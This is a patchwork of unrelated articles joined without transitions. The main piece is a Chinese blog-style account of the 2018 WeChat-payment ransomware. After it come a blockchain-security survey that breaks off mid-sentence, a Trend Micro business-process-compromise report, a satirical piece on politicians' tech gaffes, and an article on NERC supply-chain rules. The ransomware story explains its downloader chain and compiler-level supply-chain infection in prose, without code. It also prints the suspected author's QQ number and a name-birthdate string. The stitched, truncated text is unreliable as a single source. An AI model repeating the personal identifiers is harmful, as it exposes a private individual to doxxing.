本文来自微信公众号： 浅黑科技（ID：qianheikeji） ，作者：史中

你要相信，这世界上总有那么一种人，自己没想火，却一夜之间火得妈都不认识。比如参加选秀就是为了2000块钱+盒饭的杨超越。

病毒的世界亦是如此。

前两天，有一个病毒用一种混不吝的姿势冲进了所有人的视野，冲进了百度的热搜榜首。它的名字叫“微信支付勒索病毒”。搞得微信慌忙出来发声明。

就在第二天，又有一个病毒用同样混不吝的姿势冲到了百度热搜榜首。它的名字叫“支付宝病毒”。搞得支付宝又跑出来发声明。

奇葩的是，吃瓜群众研究了一圈儿，发现“微信病毒”和“支付宝病毒”竟然是同一个病毒......

连支付宝都懵逼了，发了个微博求助

不能更奇葩的是，如果按照瓜友这种命名规则，这个病毒实际上应该叫：“微信支付宝京东网易微博百度QQ天猫旺旺酷狗迅雷病毒”。

听上去真是一个要上天的病毒啊，作者肯定是个“密室SM中华田园风骚铁骨我擦嘞闹不住侠”吧？

然鹅，就在大家一脸懵逼的时候，群众们已经扒出了病毒作者的姓名、生日、手机号等等全部身份信息。

他居然是一个整天对着电脑，每天 LOL 的96年小鲜肉。

说实话，中哥自认见多识广，看到这些剧情都慌得一批。为了搞清事实的真相，我专门去拜访了一位好盆友，他就是 360 安全卫士的安全专家王亮。

王亮和他的好朋友手纸君

听亮哥讲完故事的来龙去脉，整个过程我眼睛都没眨。这时我才确认，这个瓜比想象中狗血一百倍。

这是一个有中国特色的勒索故事。

一、究竟谁感染了“微信勒索病毒”――羊毛党的起义

2018年12月1号，这天是周六，北京笼罩在“香醇”的雾霾中。

亮哥宅在家，通过电脑监控着世界各地的病毒动向。

突然，“哔哔哔哔哔哔”，后台的申诉系统弹出几十封告警。亮哥高呼一声“纳尼”。

这个系统相当于用户的“求救信号”。一般情况下，它是很安静的，除非用户觉得有些重大病毒漏掉了，才会拼命向专家团队发出“求救信号”。

亮哥一看，事有蹊跷。这几十封邮件，全都在投诉一个问题――自己电脑上的文件被莫名其妙的病毒加密了。更雷的是，居然弹出一个微信收款码，说是只要110块，就能帮你解密文件。

看到这个，亮哥有点凌乱。他的凌乱集中于两点：

第一、用微信支付码做勒索，跟在派出所里抢劫没啥区别。警察一查微信的实名认证就能破案，这属于典型的“自杀式勒索”，说明作者智商捉急。

第二、林子大了什么鸟都有。虽然用微信、支付宝作为收款途径的勒索病毒，亮哥也不是没见过，但那些病毒一般都制作得非常劣质，还没等传播呢，就被各种杀软直接秒掉。这个病毒居然不知为何能“逃”过监控，说明作者相当厉害。

那么问题来了：这不科学啊，病毒的作者究竟是聪明还是傻呢？

按照规矩，亮哥团队挨个联系用户，询问他们究竟发生了神马，然后尝试远程帮助他们排查电脑的问题。

查了一圈，亮哥更困惑了。几乎所有人电脑里都安装了型号不一的“薅羊毛程序”和“外挂程序”，而这些薅羊毛程序明明被杀毒软件报毒了，却又被用户强制拉回了信任白名单里。

比如像这样薅京东羊毛的：

还有这样的：

还有这样辅助拼多多发货的：

把薅羊毛和外挂程序拿过来一看，果然就是他们，偷偷从网上下载了带有勒索功能的病毒木马，也就是那个“微信支付勒索病毒”。

问了一圈，亮哥才明白，原来这些薅羊毛程序，本来就是天天在法律的边缘疯狂试探，杀毒软件经常会把它们判断为病毒。于是羊毛党们下载了薅羊毛程序，第一件事就是顺手把它们拉进白名单里，告诉杀软：“自家兄弟，有话好说。”

这回可好，带着勒索病毒的薅羊毛程序也被归为自家兄弟，杀毒软件被用户“强制旁观”，文件都被加密了。

（当然，很多带病毒的薅羊毛程序并没有被用户拉进白名单，它们都顺理成章地被杀毒软件干掉了，电脑也不会被加密勒索，这些不在今天的故事里。）

文件被加密了之后什么样呢？就是下面这样：

亮哥给我截了个图，展示的就是文件被加密以后，所有的 txt、docx、jpg 都打不开，打开也是乱码。

二、你知道病毒作者有多努力吗？

说了半天，“羊毛党的起义”原来是一场大型乌龙，是他们自己把病毒放行的。但事情已经发生了，现在重要的问题在于：已经被病毒加密的电脑，有没有办法抢救回来呢？

接下来我们来研究一下这个病毒。注意，这个病毒是个“勒索病毒”，勒索病毒是有尊严的。

一般情况下，勒索病毒会调用 windows 内部的加密机制，三行代码搞定，锁死你电脑上的文件，再厉害的密码专家都解不开。

这个“微信支付勒索病毒”就厉害了，作者自己写了一个几百行的代码，仿佛用尽了毕生的气力来书写一个你永世都难以解开的谜题。

然鹅，这个加密程序却用了作者自创的“民科加密法”，只需要用工具稍微一算就能解开。

哭笑不得的亮哥定睛一看，不对啊！

这个加密算法，运行一次是加密的效果。如果运行两次，也就是加密的基础上再加密，代码又会变成和加密之前一模一样。就像一枚硬币，翻一次看到背面，翻两次还是正面朝上。 （注意，实现反转的话，病毒程序的代码要做微调，小白勿试，后果自负。）

已经生无可恋的亮哥又定睛一看，还是不对啊。

加密之后的秘钥，就静悄悄地躺在硬盘上。这大概就像：你用一把锁把人家的家门给锁上，然后把钥匙放在门下的脚垫里......然后大摇大摆地说“打钱”。

Key文件就存在硬盘里

怎么说呢，病毒代码的每一行，都能透出作者的不甘平庸，但是最终的效果只能证明，作者尽力了。

12月1号晚上，亮哥把病毒分析报告传给一位同事，让他去开发一套“专杀工具”。工具当然不太复杂，同事熬了一夜，第二天早晨就把专杀工具提交上线，这个不在话下。

再回头看亮哥，既然知道病毒造成的一切破坏都有办法还原，基本就放心了。接下来，他准备带着兄弟们去追查一下这个病毒的作者究竟是何方神圣。

三、微信、支付宝以及十大互联网公司躺枪

讲真，病毒界和我们人类世界一样，也能分出三六九等：

如果病毒作者买很多服务器，然后把病毒放在里面，诱骗其他电脑来访问，那么这就属于 “病毒界的王思聪” 。

如果病毒作者只是黑了人家的服务器，然后偷偷地“借用”人家的服务器来传播病毒，那这就是 “病毒界的\L丝” 。

今天这位“微信勒索病毒”属于哪种呢？它称得上是 “\L丝中的战斗丝” 。

直接说原理。把大象装冰箱分三步，这套病毒的工作原理，也分三步：

是的，你没看错，这个薅羊毛程序就是会访问豆瓣。当然，它并不是文艺小清新，而是从豆瓣的一个网页里读取攻击指令。

就是这个网页了，原贴已被删，感谢百度快照：

本来被用来写影评的地方，写了这么一堆乱码，程序读了它，就接受到了一个指令，去哪里下载什么东西。

豆瓣页面里的指令，指向一个 QQ空间。在这个QQ空间里，有张小女孩的图片。这不是一个普通的小女孩，你看，它的分辨率只有530*456，但是它的文件大小却有6.98MB。

因为在这个图片背后，贴着一个“下载器”，可以访问指定的地址下载另一个程序。

把这张图片解压之后，能解出这么一堆文件

这个指定的地址是哪里呢？还是豆瓣......去豆瓣干什么呢？还是跳到QQ空间找另一个“下载器”。就这么循环了三次，下载了一堆形态各异的“下载器”。终于，最后一个“下载器”把剧情推进到了第三步。

最后一个“下载器”，终于从QQ空间里拿回了两样东西：这第一样我们等下再说，这第二样就是勒索病毒本尊。后面的故事就是把用户电脑上的文件加密，然后弹出微信支付二维码，大家都知道了。

以防你没明白，中哥画张图。简单来说就是薅羊毛程序下载了一串“下载器”，最后一个“下载器”下载了勒索病毒。

你看，整个勒索流程下来，它把恶意指令藏到豆瓣，把恶意程序藏到QQ空间，自己不仅连个服务器都不用买，而且连服务器都不用偷。

听到这，中哥已经跪服了。这个病毒的作者肯定是个勤俭持家的好孩子。每勒索一票赚110块，都是净利润啊。

主线剧情进行到这，又出现了一个支线剧情。

那就是我们刚才卖的关子，最后一个“下载器”从QQ空间拿回了两样东西，除了勒索病毒，另一个是神马呢？

没错，就是用来记录用户密码的程序。

问：它都可以用来记录什么密码呢？

答：支付宝、京东、网易163邮箱、微博、百度云盘、QQ网页版、天猫、旺旺、酷狗、迅雷。

其中，支付宝的安全做得最好。一般情况下，用户在支付宝页面输入密码的时候，支付宝会探测有没有程序在偷偷记录密码。所以，为了绕过支付宝的检查，黑客在支付宝的网页上生成了一个一模一样的窗口，盖住原本的密码框，骗用户输入密码。

这就是为神马到了第二天，这个病毒又被称为“支付宝病毒”的原因了。

至此，微信和支付宝躺枪的过程叙述完毕。

这个病毒之所以被叫做“微信勒索病毒”，是因为它通过微信支付勒索钱财。

这个病毒之所以被叫做“支付宝病毒”，是因为它试图盗取用户的支付宝密码。

然鹅，平心而论，这个病毒并没有只盗取支付宝的密码啊。如果它盗取谁的密码就用谁命名的话，这个病毒应该叫做“支付宝京东网易微博百度QQ天猫旺旺酷狗迅雷病毒”。

那么这个病毒究竟盗取了多少人的账号和密码呢？卖个关子，最后会揭晓。

我们继续顺着病毒追查。既然已经得知这么多信息，接下来就可以试着寻找病毒作者究竟是谁了。

四、病毒作者浮出水面

事到如今，你已经能体会这位病毒作者童鞋的风格了：虽然他“破腚”百出，但只要你留心，总能找到更奇葩的“破腚”。

刚才我们说过。那个薅羊毛程序并不是把“微信勒索病毒”下载下来，而是在之前下载了一些“下载器”，再由“下载器”把“勒索病毒”下载下来。

好的，奇葩的破绽就出在这些“下载器”上。

为了严谨，多说一句。分析了一下在真正病毒被下载之前的五个“下载器”，亮哥发现，这些下载器的代码风格和最后的病毒是一致的。这证明，“下载器”和最终病毒的作者是一个人。

在其中一个下载器里，作者竟然留下了自己的GitHub地址，而这个地址可就厉害了，用户名直接是“qq1790749886”。我读书少，但怎么看这都是一个QQ号吧。而在页面里他还留下了一串字符：LSY19960417。

我读书少，但这分明就是一个名字的缩写和生日好不好......

不用你们动手，中哥替你们搜了一下这个QQ号。

1996年，还是个白羊座......听说白羊座做事冲动，星象大师诚不我欺啊。

亮哥说，他刚开始搜到这个QQ号的时候，对方的签名还写着：“收徒，老湿傅带你写外挂。2300包教包会！” （当然现在已经改了）

而有一位叫做“雕哥”的热心网友，好奇加了他的QQ，他居然还没意识到发生了什么，要继续去打LOL。

当然，即使是一个病毒作者，中哥也并不提倡人肉他。不过实际上，这些信息被公开之后，广大网友已经把这位小哥的具体姓名人肉到了。具体的信息这里就不写了，我们暂且把他称为 LSY 吧。

至此，黑客在安全人员眼中已经遭遇了史诗级的溃败。

说到这，你一定想知道，这位黑客老湿傅究竟赚了多少钱。

当然，这个账号具体的收款详情，只有微信支付才掌握，他们并不会公布。但亮哥回忆了一个有趣的细节。

最开始亮哥接到“报警”之后，确实有一个受害者说，他已经扫码支付了110块，然后就没有然后了。

经过逆向这个病毒程序之后，亮哥发现程序根本就没那么智能，这边付过去110块，那边的LSY老湿根本不知道是谁付的钱，又怎么能帮你解锁呢。

而在亮哥尝试扫那个微信支付码的时候，这个码已经失效，因为被举报了......

怎么说呢，很可能那个付款的受害者是第一个交赎金的，也是最后一个能交进去赎金的。这个故事告诉我们： 下次遇到微信支付勒索，交智商税要趁早。磨蹭半个小时，想送钱都送不进去了。

故事讲到这里，还有一个最大的疑团没有解开，那就是：LSY老湿傅，究竟是如何把那一整套“下载病毒的指令”塞进几十款薅羊毛程序里的呢？

你可能猜不到，解开这个谜团的同时，我们顺便又打开了一个新世界的大门。

五、神秘的组织：易语言

一个神奇的事实浮出水面：

所有传播这个勒索病毒的薅羊毛、外挂程序，都有一个惊人的特点，那就是――他们都是用“易语言”编写的。

你可能会好奇，纳尼？我听说过 C 语言、php、Java，啥叫易语言？

实话实说，中哥在一天以前，也不知道神马是易语言。

给你两张易语言编程界面你体会一下：

再来一张人们学习易语言的场景：

你应该有感觉了。易语言是一个纯中文的编程界面，对于广大没有计算机背景，但是却热爱编程的人士“相当友好”。

可能你猜不到，易语言在中国有着庞大的使用群体。而在易语言的粉丝中，有一个颇为有名的论坛――精易论坛。

给你看下精易论坛的感觉：

我为什么要花这么多时间来说易语言呢？因为整个“微信勒索病毒”事件，其实都只发生在易语言的世界里。事情是这样的：

这个恶意代码可就厉害了，它感染的是易语言的编程程序。

也就是说，一旦下载过这个插件，用它编出来的程序，都是偷偷带有“下载器”功能的，软件作者并不知情。而这个“下载器”能用来下载什么，就是LSY老湿傅说了算了。

于是，LSY通过感染“编程语言母体”的方式，让母体编写出来的一切程序都天然带有病毒。就像那些可怕的基因疾病一样，如果母亲具有患病基因，那么孩子也会天然带有这种疾病。

于是，一场可怕的病毒扩散就此开始。

六、一场华丽的当众“裸奔”

讲真，这种攻击母体的方法，在黑客界已经非常出名。甚至它还有一个名字，叫做“软件供应链攻击”。

这种攻击非常有效，扩散起来非常迅速。但是真正的成熟黑客，一般不会选用这种攻击方式，原因是神马呢？

没错，就是 控制不住事态。

病毒干的这些事，盗取信息、勒索，本来应该是低调进行的。这就像抢劫团伙，本来应该夜黑风高之时在僻静的小胡同里，堵住一个弱小的姑娘要钱。没听说过哪个抢劫团伙到王府井地铁站，每人把守一个出口，站在安检旁边挨个要钱的。

但是，感染母体软件之后，病毒作者是没办法控制其他人用这些母体编写多少新程序出来的，病毒作者也没办法控制这些新编出来的带毒软件究竟会有多火，会有多少人使用。

这就像你打台球的时候，把白球直接打进洞很容易，但是用白球撞彩球进洞就更难控制准星。如果你能让五颗球连续撞击最后进洞，那你就是世界级选手了。

换句话说，就像一个小孩子扛起了火箭炮，他对接下来发生的事情根本无法控制。

这样一看，一切就都明白了：

“微信勒索病毒”，本来就是LSY老湿傅想要小范围传播的勒索软件，于是根本都没做什么伪装，还用了微信支付码。估计在他心里，预计这个病毒会感染几十人，然后其中十个人付赎金，赚个一千多块钱完事。

没想到，中国人民对于薅羊毛这件事情过于热衷，导致几万人使用了带毒的薅羊毛程序，超出了他的预料，直接惊动了中国几大杀毒软件。

事实也证明，病毒从开始传播到各大安全厂商剿灭，总共用了半天时间。但LSY老湿的蠢萌和法律意识不足，生生把一个低调的勒索病毒变成了天安门广场大型“裸奔”现场。

就这样，他从一个默默收徒的小黑客，摇身一变成了两天之内用两种姿势连续攻占百度搜索头条的男人。

事情曝光之后，LSY的豆瓣页面上的最后一条攻击代码也被他换掉了，只有一行字：

看到这里，一种复杂的心情涌上我心头。年轻总会犯错误，但有时我们为年轻付出的代价，也许过于沉重。

以上一切信息，亮哥都在第一时间同步给了警方。从公开信息看，各大安全厂商也都把自己掌握的信息交给了警方。

就在2018年12月6日晚上，微博“平安东莞”发布了一条消息。没错，LSY老湿傅落网了。

根据警方的信息，罗某某涉嫌利用自制病毒木马入侵用户计算机，非法获取淘宝、支付宝、百度网盘、邮箱等各类用户账号、密码数据约5万余条，全网已有超过10万台计算机被感染。

亮哥给我讲的故事，到这里就告一段落了。

但是回顾整个事件，我发现它的每一个环节，都只能发生在中国。

从只有中国人才用的“小霸王学习机”易语言，到中国特色的薅羊毛软件，到通过豆瓣和QQ空间进行病毒投放，到微信支付收勒索款，再到这个22岁的青年所思考的一切。

在忙碌的人群背后，有一个庞大的群体，大多数时候他们沉默着，在角落里按照自己的“规则”生存着。

他们之中，有的人赚尽荣华，坐拥香车美女；他们之中，也有人四处挣扎，幻想致富良方。

偶尔，他们中的一员被甩到舆论的中心，被人嬉笑品评，然后黯然退场。

他们，像是中国的影子。

*文章为作者独立观点，不代表虎嗅网立场

未来面前，你我还都是孩子，还不去下载虎嗅App猛嗅创新！

基础组件层利用基础设施可以实现区块链系统网络中信息的记录、验证和传播。在基础组件层之中，区块链是建立在传播机制、验证机制和存储机制基础上的一个分布式系统，整个网络没有中心化的硬件或管理机构，任何节点都有机会参与总账的记录和验证，将计算结果广播发送给其他节点，且任一节点的损坏或者退出都不会影响整个系统的运作。其对应的安全风险包括网络安全问题、密码学安全问题和数据存储安全问题。其中的数据存储安全问题涉及内容安全层面，面临有害信息上链以及资源滥用等风险，限于篇幅，具体内容不展开介绍。

区块链技术本身采用了密码学的很多机制，例如非对称加密、哈希算法等，这些密码学算法目前来讲是相对安全的。随着数学、密码学和计算技术的发展，尤其是人工智能和量子计算的兴起，这些算法面临着被破解的可能性。同时，这些密码算法需要编程实现，在代码实现方面也可能存在缺陷和漏洞。

ECC、RSA、 哈希等复杂加密算法本身以及在算法的工程实现过程中都可能存在后门和安全漏洞，进而危及整个区块链验证机制的安全性。具有超级计算能力量子计算机的出现也在对密码学构成潜在威胁，随着量子计算技术的飞速发展，大量子比特数的量子计算机、量子芯片、量子计算服务系统等相继问世，可在秒级时间内破解非对称密码算法中的大数因子分解问题(其破解拥有1024位密钥的RSA算法只需数秒),这正在成为威胁区块链数据验证机制的典型攻击手段之一。2017年5月，新型数字加密货币IOTA团队请求MIT研究组审计其软件及代码。7月，MIT研究者告知IOTA团队，他们发现了IOTA的加密哈希功能函数Curl中存在严重的漏洞(哈希碰撞),因此IOTA的数字签名及PoW安全性均无法保障。8月，IOTA 团队采用SHA-3替代掉了备受质疑的Curl哈希算法。

移动数字钱包等区块链客户端软件的安全实现涉及公私钥的使用，而通常情况下用户都是使用软件来生成公私钥，其中私钥的安全性会直接涉及到用户钱包或资产的安全问题，如果在不安全的环境中运行私钥，会增加私钥的泄露风险给用户带来不可预知的损失。目前，针对区块链客户端软件进行攻击的方法基本相同:一种方法是通过窃取凭据来寻求获得系统未经授权的访问权限;另外一种方法则是通过捕获信息、植入恶意软件和/或使用社会工程实现对用户机器中私钥的窃 取。2017年，以太坊浏览器Mist爆出“高危”漏洞，漏洞来源于底层软件框架Electron, 这个漏洞让加密数字货币私钥处于未知风险。一再发生的区块链密钥被盗攻击事件已经表明，一些程序正在生成弱密钥，产生有限范围的可能值，而通过这些有限的随机数生成器生成的密钥可以更容易地被蛮力攻击。

区块链系统以P2P网络为基础，针对P2P网络，攻击者可以发动Eclipse日食攻击、分割攻击、延迟攻击、窃听攻击、DDoS拒绝服务攻击，进而造成整个区块链系统的安全问题。

在区块链P2P网络中通常采用广播机制来传播节点信息，而广播机制中常见的攻击方式则主要有双花攻击和交易延展性攻击两种。

日食攻击是通过其他节点实施的网络层面攻击，其攻击手段是囤积和霸占受害者的点对点连接间隙，将该节点保留在一个隔离的网络中。这种类型的攻击旨在阻止最新的区块链信息进入到被攻击的节点，从而隔离节点。

比特币和以太坊网络已被证实均能被实施日食攻击。针对比特币网络，攻击者会先控制足够数量的IP地址来垄断所有受害节点之间的有效连接，之后攻击者则会征用受害者的挖掘能力，并用它来攻击区块链的一致性算法或用于“重复支付和私自挖矿”。而针对以太坊网络，攻击者会垄断受害节点所有的输入和输出连接，将受害节点与网络中其他正常节点隔离开来，进而攻击者会诱骗受害者查看不正确的以太网交易细节，诱骗卖家在交易其实还没有完成的情况下将物品交给攻击者。对比特币网络上的节点实施日食攻击需要成千上万个恶意节点才能搞垮一个受害者的节点，而在以太坊网络上，攻击者只需通过建立一个僵尸网络(如购买云服务)就可以发起攻击。论文《Low-Resource Eclipse Attacks on Ethereum' s Peer- to-Peer Network》指出:攻击者只需要两个恶意的以太坊节点就能隔离和影响另一个节点进行日食攻击，因此对以太坊网络实施日食攻击的成本较低。

边界网关协议(BGP)是因特网的关键组成部分，其主要用于确定路由路径,而通过劫持BGP可以实现对基于物联网信息传递的区块链节点流量的误导和拦截。利用BGP操纵因特网路由路径，在最近几年中已经变得越来越频繁。网络犯罪分子可以利用劫持BGP误导和拦截流量，一旦区块链网络中节点的流量被接管，会对整个网络造成巨大影响，如破坏共识机制、交易等各种信息。

攻击者可以利用BGP劫持将区块链网络划分成两个或多个无法通信的独立不相交网络，此时的区块链分叉为两条或多条并行链。攻击停止后，区块链会重新统一为一条链，以最长的链为主链，其他的链将被废弃，被废弃的链上的交易、奖励将全部无效，从而导致双重花费甚至是多次花费问题的出现。

攻击者可以利用BGP劫持来延迟目标的区块更新,而且不被发现。在目标请求获取最新区块的时候，攻击者可以基于中间人攻击修改目标请求为获取旧区块的请求，使得目标获得较旧的区块。例如在挖矿过程中如果遭遇了延迟攻击，矿工获取最新块的请求被恶意修改使其无法获取到新区块，这将导致矿工的算力无辜受损。

区块链网络中具有数以百万计的在线用户数，区块链节点会提供大量的分布式存储和网络带宽可用资源服务于百万在线用户。攻击者只需在层叠网络(应用层)中控制这些节点资源，而无需入侵区块链网络节点所运行的主机，即可利用这些资源作为一个发起大型DDoS攻击的放大平台。理论而言，将区块链网络作为DDoS攻击引擎时，假如该网络中有一百万个在线用户，则可使得攻击放大一百万倍甚至更多。

2017年2月份，以太坊Ropsten测试链遭到恶意攻击，攻击者发动了千万级别的垃圾交易信息，直接阻塞了网络的正常运行。

2018年3月22日,闪电网络节点遭受DDoS攻击，导致大约200个节点被迫离线，其在线节点从大约1,050 个降到了870个。

根据攻击方式的不同，基于区块链的DDoS攻击可分为主动攻击和被动攻击两种。基于区块链的主动DDoS攻击是通过主动向网络节点发送大量虚假信息，使得针对这些信息的后续访问都指向受害者来达到攻击效果，其具有可控性较强、放大倍数高等特点。这种攻击利用了区块链网络协议中的“推(push)” 机制，反射节点在短时间内接收到大量通知信息后不易于分析和记录，攻击者还可以通过假冒源地址来躲避IP检查,使得追踪定位攻击源更加困难。此外，主动攻击在区块链网络中引入额外流量，会降低区块链网络的查找和路由性能，而

Despite 43% of organisations surveyed in 12 countries admitting they have been affected by a business process compromise business process compromise (BPC) attack , they are not on the radar of 50% of management teams.

Half of the management teams polled did not know what these attacks are or how their business would be affected if they were targeted, according to a survey commissioned by cyber security firm Trend Micro .

The study carried out by Opinium surveyed more than 1,000 IT decision-makers responsible for cyber security across the UK, US, Germany, Spain, Italy, Sweden, Finland, France, Netherlands, Poland, Belgium and Czech Republic.

In a BPC attack, cyber criminals typically look for loopholes in business processes , vulnerable systems and susceptible practices. Once a weakness has been identified, a part of the process is altered to benefit the attacker, without the enterprise or its client detecting the change.

According to Trend Micro, 85% of organisations targeted by BPC attack would be prevented from offering at least one of their business lines.

“We’re seeing more cyber criminals playing the long game for greater reward,” said Rik Ferguson, vice-president of security research for Trend Micro.

“In a BPC attack, they could be lurking in a company’s infrastructure for months or years, monitoring processes and building up a detailed picture of how it operates.”

Once the cyber criminals have a foothold and have built a detailed picture of the target organisation’s operations, Ferguson said they can insert themselves into critical processes, undetected and without human interaction.

“For example, they might re-route valuable goods to a new address, or change printer settings to steal confidential information as was the case in the well-known Bangladeshi Bank heist ,” he said.

In this attack, cyber criminals showed that they had a strong grasp of how the Swift financial platform works and had knowledge of weaknesses in partner banks that use it. By compromising the Bangladesh Central Bank’s computer network, cyber criminals were able to trace how transfers were done and seize the bank’s credentials to conduct unauthorised transactions.

The survey revealed, however, that although half of management teams are unaware of BPC attacks, security teams are not ignoring this risk, with 72% of respondents stating that BPC is a priority when developing and implementing their organisation’s cyber security strategy.

But the study report warns that the lack of management awareness around this problem creates a cyber security knowledge gap that could leave organisations vulnerable to attack as businesses strive to transform and automate core processes to increase efficiency and competitiveness.

The most common way for cyber criminals to infiltrate corporate networks is through a business email compromise (BEC). This is a type of scam that targets email accounts of high-level employees related to finance or involved with wire transfer payments, either spoofing or compromising them through keyloggers or phishing attacks.

Read more about BEC attacks Fraudulent money transfers are top aim of business email compromise. Sharp rise in business email compromise attacks. Business email compromise attempts doubled between the first and second half of 2017. Business email compromise is the top cyber criminal trend.

In Trend Micro’s survey, 61% of organisations said they could not afford to lose money from a BEC attack. However, according to the FBI, global losses due to BEC attacks have continued to rise since December 2016, reaching $12bn earlier this year.

“To protect against all forms of BPC attacks, business and IT leaders must work together to put cyber security first and avoid potentially devastating losses,” said Ferguson.

“Companies need protection beyond perimeter controls, extending to detect unusual activity within processes if attackers breach the network. This includes locking down access to mission critical systems, file integrity monitoring and intrusion prevention to stop lateral movement within a network.”

According to Trend Micro, there are three main types of BPC attacks: diversion, piggybacking and financial manipulation.

Diversion attacks refer to those where attackers exploit security gaps in the organisation’s cash flow system. Threat actors are then able to transfer money to supposedly legitimate channels.

In piggybacking attacks, criminals take advantage of key business processes, such as the transportation of illegal goods and the transfer of malicious software, which translate to big financial gains for the attackers.

Financial manipulation attacks include those that aim to influence financial outcomes and important business decisions such as acquisitions. Attackers do this by introducing malicious variables into a key business system or process.

之前，日本新晋网络安全部长樱田义孝表示自己从来没用过电脑，甚至连USB是什么都无法解释清楚，引起日本国内一片哗然，也让吃瓜群众掩面而笑。本站也发布过一篇报道，笔者摘取部分内容回顾一下。

作为现任的网络安全部长，樱田义孝在11月14日日本国内答辩现场的回答却让人震惊：电脑相关的操作我一般都指示职员来做，所以自己并没有用过电脑。

问到关于USB的问题时：

不过毕竟这是别国的内政，我们作为群众也只能看看热闹，但是美国人似乎要抬一把国际政治舞台上一直充当美国马前卒的日本。。。 根据国际知名科技站点TechCrunch贴出来的一则小故事，看得出特朗普的网络安全顾问其实也不怎么懂网络安全。

最近纽约市前任市长、特朗普总统现任网络安全顾问鲁迪朱利安尼（Rudy Giuliani）也被打上了“ 不懂的技术政治人物 ”的标签。

朱利安尼在一条推文里忘了在句号后面加空格，而上下句的首尾单词恰好连成了一个 批评特朗普的网站 。这本来已经很尴尬了，不过，他现在又声称“Twitter 让某个人在我的文本中插入了一则令人厌恶的反总统信息”，这着实让他的网络智商在大家眼中跌成了负数。

搞不清楚眼前状况的朱利安尼抓住了一根救命稻草，即声称 Twitter 内部存在明显的反共和党偏见――特朗普和其他共和党人经常拿着个说事 ，尽管他们毫无证据 。“他们（Twitter 员工）不是职业川黑就鬼了。”朱利安尼补充道。

Twitter让某个人在我的文本中插入了一则令人厌恶的反总统信息。我后来还有一次句号之后没加空格就没出这种事。他们不是铁杆特朗普反对者就鬼了。《时代》杂志也差不多。请保持公正！！

― Rudy Giuliani (@RudyGiuliani) 2018年11月5日

这个解释倒是简单。我们在这里再次重申，他现在的职务是白宫网络安全顾问。

穆勒提出控诉趁着总统参加 G-20. 在 7 月份的时候，他也曾在总统前往赫尔辛基之前起诉那些永远不会来到这里的俄罗斯人。早一点或晚一点都可以起诉啊，简直是失控了！快来个人管管，好吗？

― Rudy Giuliani (@RudyGiuliani) 2018年11月30日

朱利安尼最初在 11 月 30 日发布的推文（如上）没有在句子之间加上空格，从而创建了一个指向 G-20.in 的超链接。一位眼尖的群众――据BBC报道，他是一位驻亚特兰大的营销总监，名叫杰森维拉兹克（Jason Velazquez）――点进了链接，并且发现它是空白的，于是他很快注册了这个域名，并创建了一个网站，在上面写上了朱利安尼所说的“一则令人厌恶的反总统信息”。

「特朗普是美奸卖国贼」：出现在朱利安尼推文中的 G-20.in 网站。

“当我意识到那个网址还可用的时候，我的心跳开始加速。我记得当时心想：‘这个家伙，朱利安尼，根本不懂是咋回事。’”委拉斯开兹在接受 BBC 采访时说，“我迅速上传了文件，在 Twitter 上公布了自己做的事，然后离开了我的公寓。”

朱利安尼最初的推文被媒体广泛报道，但他对这个话题做出的荒谬回应又让该网站得到了更多的媒体曝光。

截至太平洋标准时间 12 月 4 日 22 时 40 分，朱利安尼的两条推文仍然没有被删除。不过，从积极的一面来说，朱利安尼似乎搞清楚了如何通过回复之前的推文在 Twitter 上进行跟帖。

在此之前，朱利安尼也曾上演过另一幕 Twitter 喜剧，他对自己一则关于特朗普前任律师迈克尔科恩（Michael Cohen）达成认罪协议的推文进行了跟帖，但内容却很奇怪（如下）：

Kimim ° has f

― Rudy Giuliani (@RudyGiuliani) 2018年11月30日

这则推文跟特朗普在去年发出的“covfefe”拼写错误倒是相映成趣。

*本文转载自 techcrunch.cn ，lifeisaloop整理，转载请注明来源。

Since the attack on the power grid in Ukraine, defending critical infrastructure against the threat of cyberattack has become a top priority. In an effort to strengthen supply chain risk management within the energy sector, the Federal Energy Regulatory Commission (FERC) approved new mandatory cybersecurity reliability standards from The North American Electric Reliability Corp. (NERC). As with all major updates to an organization’s internal policies and infrastructure, utility companies now face the task of conducting internal security audits, implementing technical upgrades and adjusting long-term budgets, which will create many challenges.

The new reliability standards don’t go into effect until the end of January 2019, and organizations need to be able to demonstrate compliance by July 1, 2020, leaving them just slightly longer than 18 months to prepare. As companies endeavor to make the necessary changes, Daniel Skees, partner with Morgan Lewis, said they will likely face five major challenges.

Recent Articles By Author

So, what are those challenges and how can utilities prepare for the rollout of the new standards?

To be able to demonstrate that arrangements with vendors meet the minimum supply chain cybersecurity requirements, regulating a company’s procurement process for the first time will be one of a handful of challenges because the evidence needed for compliance is generated through procurement with vendors, Skees said. “Traditionally, compliance in security has dealt with assets and making sure controls are in place. Things like audits and granting access is all done through compliance, IT and security.”

The challenge for the utility side is that procurement has to generate auditable paperwork showing it has attempted to enter into these provisions in their contracts with vendors.

“They will have to demonstrate that they tried to get vendor participation,” said Skees. “The regulations recognize that utility companies can’t always get contractual commitments from vendors. The standard allows them to have a process to address the issues, but they don’t have to have specific contractual language. Their compliance isn’t measured by the vendor’s ability to live up to commitment.”

The risk management plan will be the foundation for demonstrating compliance. Developing and figuring out exactly what that will look like and who will be involved is no simple task.

According to Skees, utility companies will benefit from having a long ramp-up period to deal with the challenge of determining what devices and which vendor relationships will be brought into this standard. “These companies already have existing vendor contracts with specific cybersecurity terms, and the new standard doesn’t require that companies revisit and revise. Instead, it applies to new contract moving forward. Those are the relationships that are going to have to be subject to the new standard.”

The standard will require a big survey effort to determine the assets and the contracts for providing software and ongoing services, and the survey needs to be thorough―missing an asset could result in millions of dollars in fines.

Currently, utilities must have a mechanism to identify any external access from vendors or contractors that are providing support services. The new standard requires them to be able to identify instances when vendors are using that access and have the ability to terminate access if needed. “Right now it’s not required to have the ability to immediately cut that access off. The current requirement is to control the access,” Skees said.

By the time the new standards go into effect, entities are supposed to have the ability to make sure the cyber supply chain remains secure when transitioning from one vendor to another. “There’s not a lot of context behind what that is supposed to look like, which can result in some difficult conversations,” Skees said.

Companies have existing commitments and controls with a supplier, but realize perhaps that it’s not the right vendor, and they need to switch. Because companies need to address cybersecurity challenges as they drop one vendor and replace it with another, cooperation between the outgoing and incoming vendors will be necessary. However, that could prove to be mildly awkward, as the vendor being dropped has little incentive to play nice.

The new standards also raise some important concerns, as the intention is not to create a situation where companies are looking to do the bare minimum to meet the requirements necessary for compliance. In addition, “Everyone will need to realize that since they are going to be asking more from vendors, it will drive up the cost of those goods and services. They are asking vendors to do more, but doing more has a cost associated with it. If a vendor contractually commits to security controls, that requires investment, and it will cost more to get these services,” Skees said.

